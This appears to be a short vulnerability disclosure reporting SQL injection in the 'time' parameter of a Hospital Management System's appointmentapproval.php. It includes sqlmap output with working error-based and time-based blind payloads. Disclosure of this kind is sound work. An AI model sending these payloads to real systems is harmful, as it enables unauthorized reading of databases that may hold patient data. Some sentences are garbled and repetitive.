Hospital Management System appointmentapproval.php has Sqlinjection

A SQL injection vulnerability exists in the Hospital Management System appointmentapproval.php has Sqlinjection has Sqlinjection. The basic introduction of the vulnerability is that SQL injection means that the web application does not strictly judge or filter the validity of user input data. An attacker can add additional SQL statements to the end of a predefined query statement in a web application, and perform illegal operations without the knowledge of the administrator. In this way, the database server can be tricked into performing any unauthorized query and obtaining the corresponding data information.

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Sqlmap Attack

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Parameter: time (POST)

Type: error-based

Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause

(GTID_SUBSET)

Payload: appointmentdate=2016-03-

15&appreason=555&select5=11&select6=35&submit=Submit&time=1'"" WHERE 9974=9974 AND

GTID_SUBSET(CONCAT(0x7162706a71,(SELECT (ELT(9803=9803,1))),0x7178787071),9803)-- uwXX

Type: time-based blind

Title: MySQL < 5.0.12 AND time-based blind (BENCHMARK)

Payload: appointmentdate=2016-03-

15&appreason=555&select5=11&select6=35&submit=Submit&time=1'"" WHERE 6835=6835 AND
```

4487=BENCHMARK(5000000,MD5(0x435a6945))-- wPVs
